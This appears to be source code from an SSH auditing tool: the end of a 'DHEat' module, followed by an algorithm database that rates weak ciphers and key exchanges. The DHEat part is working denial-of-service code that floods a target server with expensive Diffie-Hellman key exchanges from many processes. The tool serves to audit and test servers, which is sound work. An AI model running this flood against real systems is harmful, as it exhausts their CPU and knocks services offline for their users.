        if len(ip_version_preference) == 1:
            family = socket.AF_INET if ip_version_preference[0] == 4 else socket.AF_INET6

        r = socket.getaddrinfo(host, 0, family, socket.SOCK_STREAM)
        for address_family, socktype, _, _, addr in r:
            if socktype == socket.SOCK_STREAM:
                return address_family, addr[0]

        return -1, ''


    def _run(self) -> bool:
        '''Where all the magic happens.'''


        self.output()
        if sys.platform == "win32":
            self.output("%sWARNING:%s this feature has not been thoroughly tested on Windows.  It may perform worse than on UNIX OSes." % (self.YELLOWB, self.CLEAR))

        self.output("Running DHEat test against %s[%s]:%u%s with %s%u%s concurrent sockets..." % (self.WHITEB, self.target_ip_address, self.port, self.CLEAR, self.WHITEB, self.concurrent_connections, self.CLEAR))

        # If the user didn't specify an exact kex algorithm to test, check our prioritized list against what the server supports.  Larger p-values (such as group18: 8192-bits) cause the most strain on the server.
        chosen_alg = ""
        gex_modulus_size = -1
        if self.target_kex == "":

            # Look through the server's kex list and see if any are GEX algorithms.  To save time, we will only check the first GEX we encounter, instead of all of them (I assume the results will be the same anyway).
            server_gex_alg = ""
            for server_kex in self.kex.kex_algorithms:
                if server_kex in DHEat.gex_algs:
                    server_gex_alg = server_kex
                    break

            # If the server supports at least one gex algorithm, find the largest modulus it supports.  Store an entry in the alg_modulus_sizes so we remember this for later.
            if server_gex_alg != "":
                # self.output("Analyzing server's group exchange algorithm, %s, to find largest modulus it supports..." % (server_gex_alg))
                gex_modulus_size = self.analyze_gex(server_gex_alg)
                # self.output("The largest modulus supported by %s appears to be %u." % (server_gex_alg, largest_bit_modulus))

            # Now choose the KEX/GEX with the largest modulus that is supported by the server.
            chosen_alg = ""
            for alg in DHEat.alg_priority:
                if alg in self.kex.kex_algorithms:
                    chosen_alg = alg
                    break

            # If the server's kex options don't intersect with our prioritized algorithm list, then we cannot run this test.
            if chosen_alg == "":
                self.out.fail("Error: server's key exchange algorithms do not match with any algorithms implemented by this client!")
                self.out.warn("Server's key exchanges: \n  * %s" % ("\n  * ".join(self.kex.kex_algorithms)))
                self.out.warn("Client's key exchanges: \n  * %s" % ("\n  * ".join(DHEat.alg_priority)))
                return False

            self.debug("Chose [%s] from prioritized list: [%s]" % (chosen_alg, ", ".join(DHEat.alg_priority)))

        else:  # The user specified an exact algorithm to test.

            # If the user chose an algorithm we don't have an implementation for...
            if (self.target_kex not in DHEat.alg_priority) and (self.target_kex not in DHEat.gex_algs):
                self.out.fail("Specified target key exchange [%s] is not in list of implemented algorithms: [%s]." % (self.target_kex, ", ".join(DHEat.alg_priority)))
                return False

            # Ensure that what the user chose is supported by the server.
            if self.target_kex not in self.kex.kex_algorithms:
                self.out.fail("Specified target key exchange [%s] is not supported by the server: [%s]." % (self.target_kex, ", ".join(self.kex.kex_algorithms)))
                return False

            # If this is a GEX, find the largest modulus it supports.
            if self.target_kex in DHEat.gex_algs:
                gex_modulus_size = self.analyze_gex(self.target_kex)

            chosen_alg = self.target_kex

        self.output("Targeting server algorithm: %s%s%s (modulus size: %u)" % (self.WHITEB, chosen_alg, self.CLEAR, DHEat.alg_modulus_sizes[chosen_alg]))

        if self.user_set_e_len and chosen_alg not in self.HARDCODED_ALGS:
            self.output("Using user-supplied e length: %u" % (self.e_rand_len))
            if chosen_alg in self.COMPLEX_PQ_ALGS:
                self.output("{:s}NOTE:{:s} short e lengths can work against the post-quantum algorithm targeted, but the current implementation of this attack results in protocol errors; the number of successful DH KEX replies will be reported as zero even though the CPU will still be exhausted.".format(self.YELLOWB, self.CLEAR))
        elif self.user_set_e_len and chosen_alg in self.HARDCODED_ALGS:
            self.output("{:s}NOTE:{:s} ignoring user-supplied e length, since the targeted algorithm (a NIST P-curve) must use hard-coded e values.".format(self.YELLOWB, self.CLEAR))

        # If an untested DH alg is chosen, ask the user to e-mail the maintainer/create a GitHub issue to report success.
        if chosen_alg not in DHEat.tested_algs:
            self.output()
            self.output(DHEat.untested_alg_notice.format(color_start=self.YELLOWB, color_end=self.CLEAR, dh_alg=chosen_alg))

        self.output()
        self.output("Commencing denial-of-service attack.  Validate results by monitoring target's CPU idle status.")
        self.output()
        self.output("Press CTRL-C to stop attack and see statistics.")
        self.output()

        self.generate_kex(chosen_alg)

        # If the user didn't already choose the e length, calculate the length of the random bytes we need to generate the value e that we'll send to the server.
        if not self.user_set_e_len:
            self.e_rand_len = int(DHEat.alg_modulus_sizes[chosen_alg] / 8) - 1
            # self.debug("Setting e_rand_len to %u." % self.e_rand_len)

        # Create all the processes.
        multiprocessing.set_start_method("spawn")
        q: Any = multiprocessing.Queue()
        for _ in range(0, self.concurrent_connections):
            p = multiprocessing.Process(target=self.worker_process, args=(q, chosen_alg, gex_modulus_size,))
            p.start()

        spinner = ["-", "\\", "|", "/"]
        spinner_index = 0

        # Read the statistics from the child processes, and update the UI once per second.
        last_update = time.time()
        while True:

            try:
                # Ensure an upper bound of 5 seconds without updating the UI.
                for _ in range(0, 5):
                    thread_statistics = q.get(True, 1.0)  # Block for up to 1 second.
                    self.num_attempted_tcp_connections += thread_statistics['num_attempted_tcp_connections']
                    self.num_successful_tcp_connections += thread_statistics['num_successful_tcp_connections']
                    self.num_successful_dh_kex += thread_statistics['num_successful_dh_kex']
                    self.num_failed_dh_kex += thread_statistics['num_failed_dh_kex']
                    self.num_bytes_written += thread_statistics['num_bytes_written']
                    self.num_connect_timeouts += thread_statistics['num_connect_timeouts']
                    self.num_read_timeouts += thread_statistics['num_read_timeouts']
                    self.num_socket_exceptions += thread_statistics['num_socket_exceptions']
                    self.num_openssh_throttled_connections += thread_statistics['num_openssh_throttled_connections']
            except queue.Empty:  # If Queue.get() timeout exceeded.
                pass

            now = time.time()
            if (now - last_update) >= 1.0:
                seconds_running = now - self.start_timer
                print("%s%s%s TCP SYNs/sec: %s%u%s; Compl. conns/sec: %s%u%s; Bytes sent/sec: %s%s%s; DH kex/sec: %s%u%s    \r" % (self.WHITEB, spinner[spinner_index], self.CLEAR, self.BLUEB, self.num_attempted_tcp_connections / seconds_running, self.CLEAR, self.BLUEB, self.num_successful_tcp_connections / seconds_running, self.CLEAR, self.BLUEB, DHEat.add_byte_units(self.num_bytes_written / seconds_running), self.CLEAR, self.PURPLEB, self.num_successful_dh_kex / seconds_running, self.CLEAR), end="")
                last_update = now
                spinner_index = (spinner_index + 1) % 4


    def worker_process(self, q: Any, chosen_alg: str, gex_modulus_size: int) -> None:
        '''Worker process that floods the target.'''

        # Handle CTRL-C gracefully.
        try:
            self._worker_process(q, chosen_alg, gex_modulus_size)
        except KeyboardInterrupt:
            pass


    def _worker_process(self, q: Any, chosen_alg: str, gex_modulus_size: int) -> None:
        '''Worker process that floods the target.'''


        def _close_socket(s: socket.socket) -> None:
            try:
                s.shutdown(socket.SHUT_RDWR)
                s.close()
            except OSError:
                pass


        # Copy variables from the object (which might exist in another process?).  This might cut down on inter-process overhead.
        connect_timeout = self.connect_timeout
        target_ip_address = self.target_ip_address
        target_address_family = self.target_address_family
        port = self.port

        # Determine if we are attacking with a GEX.
        gex_mode = False
        if chosen_alg in DHEat.gex_algs:
            gex_mode = True
            self.debug("Setting GEX mode to True; gex_modulus_size: %u" % gex_modulus_size)

        # Attack statistics local to this process.
        num_attempted_tcp_connections = 0
        num_successful_tcp_connections = 0
        num_successful_dh_kex = 0
        num_failed_dh_kex = 0
        num_bytes_written = 0
        num_connect_timeouts = 0
        num_read_timeouts = 0
        num_socket_exceptions = 0
        num_openssh_throttled_connections = 0

        num_loops_since_last_statistics_sync = 0
        while True:
            num_loops_since_last_statistics_sync += 1

            # Instead of flooding the parent process with statistics, report our stats only every 5 connections.
            if num_loops_since_last_statistics_sync > 5:
                num_loops_since_last_statistics_sync = 0

                q.put({
                    'num_attempted_tcp_connections': num_attempted_tcp_connections,
                    'num_successful_tcp_connections': num_successful_tcp_connections,
                    'num_successful_dh_kex': num_successful_dh_kex,
                    'num_failed_dh_kex': num_failed_dh_kex,
                    'num_bytes_written': num_bytes_written,
                    'num_connect_timeouts': num_connect_timeouts,
                    'num_read_timeouts': num_read_timeouts,
                    'num_socket_exceptions': num_socket_exceptions,
                    'num_openssh_throttled_connections': num_openssh_throttled_connections,
                })

                # Since we sent our statistics, reset them all back to zero.
                num_attempted_tcp_connections = 0
                num_successful_tcp_connections = 0
                num_successful_dh_kex = 0
                num_failed_dh_kex = 0
                num_bytes_written = 0
                num_connect_timeouts = 0
                num_read_timeouts = 0
                num_socket_exceptions = 0
                num_openssh_throttled_connections = 0

            s = socket.socket(target_address_family, socket.SOCK_STREAM)
            s.settimeout(connect_timeout)

            # Loop until a successful TCP connection is made.
            connected = False
            while not connected:

                # self.debug("Connecting to %s:%d" % (self.target_ip_address, self.port))
                try:
                    num_attempted_tcp_connections += 1
                    s.connect((target_ip_address, port))
                    connected = True
                except OSError as e:
                    self.debug("Failed to connect: %s" % str(e))

            # Send everything all at once.  This isn't technically valid to do, but SSH implementations seem to be fine with it.
            bytes_to_write = b""
            if gex_mode:
                bytes_to_write = self.banner + self.make_kexinit() + self.make_gex_request(gex_modulus_size)
            else:
                bytes_to_write = self.banner + self.make_kexinit() + self.make_dh_kexinit(chosen_alg)

            try:
                s.sendall(bytes_to_write)
                num_bytes_written += len(bytes_to_write)
            except (ConnectionResetError, BrokenPipeError):
                num_socket_exceptions += 1
            except socket.timeout:
                num_connect_timeouts += 1

            banner, extra = self.read_banner(s)
            if banner == b'':
                self.debug("Blank banner received.")
                _close_socket(s)
                num_socket_exceptions += 1
                continue

            # If we receive a valid SSH banner from the server, we'll count it as a successful connection.  Note that OpenSSH returns "Exceeded MaxStartups" when throttling occurs (due to the MaxStartups setting).
            if banner.startswith(b"SSH-2.0-") or banner.startswith(b"SSH-1"):
                num_successful_tcp_connections += 1
            elif banner == b'Exceeded MaxStartups':
                num_openssh_throttled_connections += 1
                _close_socket(s)
                continue
            else:
                self.debug("Invalid banner received: %r" % banner)
                _close_socket(s)
                continue

            # Read the KEXINIT from the server.
            message_code = -1
            try:
                message_code, _ = self.read_ssh_packet(s, extra=extra)
                # self.debug("Message code: %u" % message_code)
            except (ConnectionResetError, socket.timeout) as e:
                num_failed_dh_kex += 1
                num_socket_exceptions += 1
                _close_socket(s)
                self.debug("Exception in read_ssh_packet: %s" % str(e))
                continue

            # Ensure that we received Key Exchange Init (20).
            if message_code != 20:
                num_failed_dh_kex += 1
                _close_socket(s)
                self.debug("Expected Kex Exchange Init (20), received: %u" % message_code)
                continue

            # Read the Diffie-Hellman Key Exchange Init from the server.
            message_code = -1
            try:
                message_code, gex_msb = self.read_ssh_packet(s)
                # self.debug("Message code: %u" % message_code)
            except (ConnectionResetError, socket.timeout) as e:
                num_failed_dh_kex += 1
                num_socket_exceptions += 1
                _close_socket(s)
                self.debug("Exception in read_ssh_packet: %s" % str(e))
                continue

            # If we get message code 31, then we know the server properly handled our Diffie-Hellman Key Exchange Init, and thus, wasted its time.
            if message_code == 31:

                if not gex_mode:
                    num_successful_dh_kex += 1

                # If we're targeting a GEX, we need to send and receive another set of packets.
                else:
                    # Send the Diffie-Hellman Group Exchange Init (32).
                    bytes_to_write = self.make_dh_kexinit(chosen_alg, gex_msb=gex_msb)
                    try:
                        s.sendall(bytes_to_write)
                        num_bytes_written += len(bytes_to_write)
                    except (ConnectionResetError, BrokenPipeError):
                        num_socket_exceptions += 1
                    except socket.timeout:
                        num_connect_timeouts += 1

                    try:
                        message_code, _ = self.read_ssh_packet(s)
                    except (ConnectionResetError, socket.timeout) as e:
                        num_failed_dh_kex += 1
                        num_socket_exceptions += 1
                        _close_socket(s)
                        self.debug("Exception in read_ssh_packet: %s" % str(e))
                        continue

                    # If we received Diffie-Hellman Group Exchange Reply (33), then we know the server properly handled our Diffie-Hellman Group Exchange Init (32), and thus, wasted its time.
                    if message_code == 33:
                        num_successful_dh_kex += 1
                    else:
                        num_failed_dh_kex += 1

            else:
                num_failed_dh_kex += 1

            _close_socket(s)



"""
   The MIT License (MIT)

   Copyright (C) 2017-2024 Joe Testa (jtesta@positronsecurity.com)
   Copyright (C) 2017 Andris Raugulis (moo@arthepsy.eu)

   Permission is hereby granted, free of charge, to any person obtaining a copy
   of this software and associated documentation files (the "Software"), to deal
   in the Software without restriction, including without limitation the rights
   to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
   copies of the Software, and to permit persons to whom the Software is
   furnished to do so, subject to the following conditions:

   The above copyright notice and this permission notice shall be included in
   all copies or substantial portions of the Software.

   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
   IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
   FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
   AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
   LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
   THE SOFTWARE.
"""
# pylint: disable=unused-import
import copy
import threading

from typing import Dict, List, Set, Sequence, Tuple, Iterable  # noqa: F401
from typing import Callable, Optional, Union, Any  # noqa: F401


class SSH2_KexDB:  # pylint: disable=too-few-public-methods
    FAIL_1024BIT_MODULUS = 'using small 1024-bit modulus'
    FAIL_3DES = 'using broken & deprecated 3DES cipher'
    FAIL_BLOWFISH = 'using weak & deprecated Blowfish cipher'
    FAIL_CAST = 'using weak & deprecated CAST cipher'
    FAIL_DES = 'using broken DES cipher'
    FAIL_IDEA = 'using deprecated IDEA cipher'
    FAIL_LOGJAM_ATTACK = 'vulnerable to the Logjam attack: https://en.wikipedia.org/wiki/Logjam_(computer_security)'
    FAIL_MD5 = 'using broken MD5 hash algorithm'
    FAIL_NSA_BACKDOORED_CURVE = 'using elliptic curves that are suspected as being backdoored by the U.S. National Security Agency'
    FAIL_PLAINTEXT = 'no encryption/integrity'
    FAIL_RC4 = 'using broken RC4 cipher'
    FAIL_RIJNDAEL = 'using deprecated & non-standardized Rijndael cipher'
    FAIL_RIPEMD = 'using deprecated RIPEMD hash algorithm'
    FAIL_SEED = 'using deprecated SEED cipher'
    FAIL_SERPENT = 'using deprecated Serpent cipher'
    FAIL_SHA1 = 'using broken SHA-1 hash algorithm'
    FAIL_SMALL_ECC_MODULUS = 'using small ECC modulus'
    FAIL_UNKNOWN = 'using unknown algorithm'
    FAIL_UNPROVEN = 'using unproven algorithm'
    FAIL_UNTRUSTED = 'using untrusted algorithm developed in secret by a government entity'

    WARN_2048BIT_MODULUS = '2048-bit modulus only provides 112-bits of symmetric strength'
    WARN_BLOCK_SIZE = 'using small 64-bit block size'
    WARN_CIPHER_MODE = 'using weak cipher mode'
    WARN_ENCRYPT_AND_MAC = 'using encrypt-and-MAC mode'
    WARN_EXPERIMENTAL = 'using experimental algorithm'
    WARN_RNDSIG_KEY = 'using weak random number generator could reveal the key'
    WARN_TAG_SIZE = 'using small 64-bit tag size'
    WARN_TAG_SIZE_96 = 'using small 96-bit tag size'

    INFO_DEFAULT_OPENSSH_CIPHER = 'default cipher since OpenSSH 6.9'
    INFO_DEFAULT_OPENSSH_KEX_65_TO_73 = 'default key exchange from OpenSSH 6.5 to 7.3'
    INFO_DEFAULT_OPENSSH_KEX_74_TO_89 = 'default key exchange from OpenSSH 7.4 to 8.9'
    INFO_DEFAULT_OPENSSH_KEX_90_TO_98 = 'default key exchange from OpenSSH 9.0 to 9.8'
    INFO_DEFAULT_OPENSSH_KEX_99 = 'default key exchange since OpenSSH 9.9'
    INFO_DEPRECATED_IN_OPENSSH88 = 'deprecated in OpenSSH 8.8: https://www.openssh.com/txt/release-8.8'
    INFO_DISABLED_IN_DBEAR67 = 'disabled in Dropbear SSH 2015.67'
    INFO_DISABLED_IN_OPENSSH70 = 'disabled in OpenSSH 7.0: https://www.openssh.com/txt/release-7.0'
    INFO_NEVER_IMPLEMENTED_IN_OPENSSH = 'despite the @openssh.com tag, this was never implemented in OpenSSH'
    INFO_HYBRID_PQ_X25519_KEX = 'hybrid key exchange based on post-quantum resistant algorithm and proven conventional X25519 algorithm'
    INFO_REMOVED_IN_OPENSSH61 = 'removed since OpenSSH 6.1, removed from specification'
    INFO_REMOVED_IN_OPENSSH69 = 'removed in OpenSSH 6.9: https://www.openssh.com/txt/release-6.9'
    INFO_REMOVED_IN_OPENSSH70 = 'removed in OpenSSH 7.0: https://www.openssh.com/txt/release-7.0'
    INFO_WITHDRAWN_PQ_ALG = 'the sntrup4591761 algorithm was withdrawn, as it may not provide strong post-quantum security'
    INFO_EXTENSION_NEGOTIATION = 'pseudo-algorithm that denotes the peer supports RFC8308 extensions'
    INFO_STRICT_KEX = 'pseudo-algorithm that denotes the peer supports a stricter key exchange method as a counter-measure to the Terrapin attack (CVE-2023-48795)'

    # Maintains a dictionary per calling thread that yields its own copy of MASTER_DB.  This prevents results from one thread polluting the results of another thread.
    DB_PER_THREAD: Dict[int, Dict[str, Dict[str, List[List[Optional[str]]]]]] = {}

    MASTER_DB: Dict[str, Dict[str, List[List[Optional[str]]]]] = {
        # Format: 'algorithm_name': [['version_first_appeared_in'], [reason_for_failure1, reason_for_failure2, ...], [warning1, warning2, ...], [info1, info2, ...]]
        'kex': {
            'Curve25519SHA256': [[]],
            'curve25519-sha256': [['7.4,d2018.76'], [], [], [INFO_DEFAULT_OPENSSH_KEX_74_TO_89]],
            'curve25519-sha256@libssh.org': [['6.4,d2013.62,l10.6.0'], [], [], [INFO_DEFAULT_OPENSSH_KEX_65_TO_73]],
            'curve448-sha512': [[]],
            'curve448-sha512@libssh.org': [[]],
            'diffie-hellman-group14-sha1': [['3.9,d0.53,l10.6.0'], [FAIL_SHA1], [WARN_2048BIT_MODULUS]],
            'diffie-hellman-group14-sha224@ssh.com': [[]],
            'diffie-hellman-group14-sha256': [['7.3,d2016.73'], [], [WARN_2048BIT_MODULUS]],
            'diffie-hellman-group14-sha256@ssh.com': [[], [], [WARN_2048BIT_MODULUS]],
            'diffie-hellman-group15-sha256': [[]],
            'diffie-hellman-group15-sha256@ssh.com': [[]],
            'diffie-hellman-group15-sha384@ssh.com': [[]],
            'diffie-hellman-group15-sha512': [[]],
            'diffie-hellman-group16-sha256': [[]],
            'diffie-hellman-group16-sha384@ssh.com': [[]],
            'diffie-hellman-group16-sha512': [['7.3,d2016.73']],
            'diffie-hellman-group16-sha512@ssh.com': [[]],
            'diffie-hellman-group17-sha512': [[]],
            'diffie-hellman_group17-sha512': [[]],
            'diffie-hellman-group18-sha512': [['7.3']],
            'diffie-hellman-group18-sha512@ssh.com': [[]],
            'diffie-hellman-group1-sha1': [['2.3.0,d0.28,l10.2', '6.6', '6.9'], [FAIL_1024BIT_MODULUS, FAIL_LOGJAM_ATTACK, FAIL_SHA1], [], [INFO_REMOVED_IN_OPENSSH69]],
            'diffie-hellman-group1-sha256': [[], [FAIL_1024BIT_MODULUS]],
            'diffie-hellman-group-exchange-sha1': [['2.3.0', '6.6', None], [FAIL_SHA1]],
            'diffie-hellman-group-exchange-sha224@ssh.com': [[]],
            'diffie-hellman-group-exchange-sha256': [['4.4']],
            'diffie-hellman-group-exchange-sha256@ssh.com': [[]],
            'diffie-hellman-group-exchange-sha384@ssh.com': [[]],
            'diffie-hellman-group-exchange-sha512@ssh.com': [[]],
            'ecdh-nistp256-kyber-512r3-sha256-d00@openquantumsafe.org': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-nistp384-kyber-768r3-sha384-d00@openquantumsafe.org': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-nistp521-kyber-1024r3-sha512-d00@openquantumsafe.org': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-1.2.840.10045.3.1.1': [[], [FAIL_SMALL_ECC_MODULUS, FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-192 / secp192r1
            'ecdh-sha2-1.2.840.10045.3.1.7': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-256 / secp256r1
            'ecdh-sha2-1.3.132.0.10': [[]],  # ECDH over secp256k1 (i.e.: the Bitcoin curve)
            'ecdh-sha2-1.3.132.0.16': [[], [FAIL_UNPROVEN]],  # sect283k1
            'ecdh-sha2-1.3.132.0.1': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],  # sect163k1
            'ecdh-sha2-1.3.132.0.26': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],  # sect233k1
            'ecdh-sha2-1.3.132.0.27': [[], [FAIL_SMALL_ECC_MODULUS, FAIL_NSA_BACKDOORED_CURVE]],  # sect233r1
            'ecdh-sha2-1.3.132.0.33': [[], [FAIL_SMALL_ECC_MODULUS, FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-224 / secp224r1
            'ecdh-sha2-1.3.132.0.34': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-384 / secp384r1
            'ecdh-sha2-1.3.132.0.35': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-521 / secp521r1
            'ecdh-sha2-1.3.132.0.36': [[], [FAIL_UNPROVEN]],  # sect409k1
            'ecdh-sha2-1.3.132.0.37': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # sect409r1
            'ecdh-sha2-1.3.132.0.38': [[], [FAIL_UNPROVEN]],  # sect571k1

            # Note: the base64 strings, according to draft 6 of RFC5656, is Base64(MD5(DER(OID))).  The final RFC5656 dropped the base64 strings in favor of plain OID concatenation, but apparently some SSH servers implement them anyway.  See: https://datatracker.ietf.org/doc/html/draft-green-secsh-ecc-06#section-9.2
            'ecdh-sha2-4MHB+NBt3AlaSRQ7MnB4cg==': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],  # sect163k1
            'ecdh-sha2-5pPrSUQtIaTjUSt5VZNBjg==': [[], [FAIL_SMALL_ECC_MODULUS, FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-192 / secp192r1
            'ecdh-sha2-9UzNcgwTlEnSCECZa7V1mw==': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-256 / secp256r1
            'ecdh-sha2-brainpoolp256r1@genua.de': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-brainpoolp384r1@genua.de': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-brainpoolp521r1@genua.de': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-curve25519': [[], []],
            'ecdh-sha2-D3FefCjYoJ/kfXgAyLddYA==': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # sect409r1
            'ecdh-sha2-h/SsxnLCtRBh7I9ATyeB3A==': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-521 / secp521r1
            'ecdh-sha2-m/FtSAmrV4j/Wy6RVUaK7A==': [[], [FAIL_UNPROVEN]],  # sect409k1
            'ecdh-sha2-mNVwCXAoS1HGmHpLvBC94w==': [[], [FAIL_UNPROVEN]],  # sect571k1
            'ecdh-sha2-nistb233': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],
            'ecdh-sha2-nistb409': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-nistk163': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],
            'ecdh-sha2-nistk233': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],
            'ecdh-sha2-nistk283': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-nistk409': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-nistp192': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-nistp224': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-nistp256': [['5.7,d2013.62,l10.6.0'], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-nistp384': [['5.7,d2013.62'], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-nistp521': [['5.7,d2013.62'], [FAIL_NSA_BACKDOORED_CURVE]],
            'ecdh-sha2-nistt571': [[], [FAIL_UNPROVEN]],
            'ecdh-sha2-qCbG5Cn/jjsZ7nBeR7EnOA==': [[FAIL_SMALL_ECC_MODULUS, FAIL_NSA_BACKDOORED_CURVE]],  # sect233r1
            'ecdh-sha2-qcFQaMAMGhTziMT0z+Tuzw==': [[], [FAIL_NSA_BACKDOORED_CURVE]],  # NIST P-384 / secp384r1
            'ecdh-sha2-VqBg4QRPjxx1EXZdV0GdWQ==': [[], [FAIL_NSA_BACKDOORED_CURVE, FAIL_SMALL_ECC_MODULUS]],  # NIST P-224 / secp224r1
            'ecdh-sha2-wiRIU8TKjMZ418sMqlqtvQ==': [[], [FAIL_UNPROVEN]],  # sect283k1
            'ecdh-sha2-zD/b3hu/71952ArpUG4OjQ==': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS]],  # sect233k1
            'ecmqv-sha2': [[], [FAIL_UNPROVEN]],
            'ext-info-c': [['7.2'], [], [], [INFO_EXTENSION_NEGOTIATION]],  # Extension negotiation (RFC 8308)
            'ext-info-s': [['9.6'], [], [], [INFO_EXTENSION_NEGOTIATION]],  # Extension negotiation (RFC 8308)
            'kex-strict-c-v00@openssh.com': [[], [], [], [INFO_STRICT_KEX]],  # Strict KEX marker (countermeasure for CVE-2023-48795).
            'kex-strict-s-v00@openssh.com': [[], [], [], [INFO_STRICT_KEX]],  # Strict KEX marker (countermeasure for CVE-2023-48795).

            # The GSS kex algorithms get special wildcard handling, since they include variable base64 data after their standard prefixes.
            'gss-13.3.132.0.10-sha256-*': [[], [FAIL_UNKNOWN]],
            'gss-curve25519-sha256-*': [[]],
            'gss-curve448-sha512-*': [[]],
            'gss-gex-sha1-*': [[], [FAIL_SHA1]],
            'gss-gex-sha256-*': [[]],
            'gss-group14-sha1-*': [[], [FAIL_SHA1], [WARN_2048BIT_MODULUS]],
            'gss-group14-sha256-*': [[], [], [WARN_2048BIT_MODULUS]],
            'gss-group15-sha512-*': [[]],
            'gss-group16-sha512-*': [[]],
            'gss-group17-sha512-*': [[]],
            'gss-group18-sha512-*': [[]],
            'gss-group1-sha1-*': [[], [FAIL_1024BIT_MODULUS, FAIL_LOGJAM_ATTACK, FAIL_SHA1]],
            'gss-nistp256-sha256-*': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'gss-nistp384-sha256-*': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'gss-nistp384-sha384-*': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'gss-nistp521-sha512-*': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'kexAlgoCurve25519SHA256': [[]],
            'kexAlgoDH14SHA1': [[], [FAIL_SHA1], [WARN_2048BIT_MODULUS]],
            'kexAlgoDH1SHA1': [[], [FAIL_1024BIT_MODULUS, FAIL_LOGJAM_ATTACK, FAIL_SHA1]],
            'kexAlgoECDH256': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'kexAlgoECDH384': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'kexAlgoECDH521': [[], [FAIL_NSA_BACKDOORED_CURVE]],
            'kexguess2@matt.ucc.asn.au': [['d2013.57']],
            'm383-sha384@libassh.org': [[], [FAIL_UNPROVEN]],
            'm511-sha512@libassh.org': [[], [FAIL_UNPROVEN]],
            'mlkem768x25519-sha256': [['9.9'], [], [], [INFO_HYBRID_PQ_X25519_KEX]],
            'rsa1024-sha1': [[], [FAIL_1024BIT_MODULUS, FAIL_SHA1]],
            'rsa2048-sha256': [[], [], [WARN_2048BIT_MODULUS]],
            'sm2kep-sha2-nistp256': [[], [FAIL_NSA_BACKDOORED_CURVE, FAIL_UNTRUSTED]],
            'sntrup4591761x25519-sha512@tinyssh.org': [['8.0', '8.4'], [], [WARN_EXPERIMENTAL], [INFO_WITHDRAWN_PQ_ALG]],
            'sntrup761x25519-sha512': [['9.9'], [], [], [INFO_DEFAULT_OPENSSH_KEX_99, INFO_HYBRID_PQ_X25519_KEX]],
            'sntrup761x25519-sha512@openssh.com': [['8.5'], [], [], [INFO_DEFAULT_OPENSSH_KEX_90_TO_98, INFO_HYBRID_PQ_X25519_KEX]],
            'x25519-kyber-512r3-sha256-d00@amazon.com': [[]],
            'x25519-kyber512-sha512@aws.amazon.com': [[]],
        },
        'key': {
            'dsa2048-sha224@libassh.org': [[], [FAIL_UNPROVEN], [WARN_2048BIT_MODULUS]],
            'dsa2048-sha256@libassh.org': [[], [FAIL_UNPROVEN], [WARN_2048BIT_MODULUS]],
            'dsa3072-sha256@libassh.org': [[], [FAIL_UNPROVEN]],
            'ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com': [[], [FAIL_UNKNOWN]],
            'ecdsa-sha2-1.3.132.0.10': [[], [], [WARN_RNDSIG_KEY]],  # ECDSA over secp256k1 (i.e.: the Bitcoin curve)
            'ecdsa-sha2-curve25519': [[], [], [WARN_RNDSIG_KEY]],  # ECDSA with Curve25519?  Bizarre...
            'ecdsa-sha2-nistb233': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistb409': [[], [FAIL_UNPROVEN], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistk163': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistk233': [[], [FAIL_UNPROVEN, FAIL_SMALL_ECC_MODULUS], [WARN_RNDSIG_KEY]],
            'ecdsa-sha2-nistk283': [[], [FAIL_UNPROVEN], [WARN_RNDSIG_KEY]],
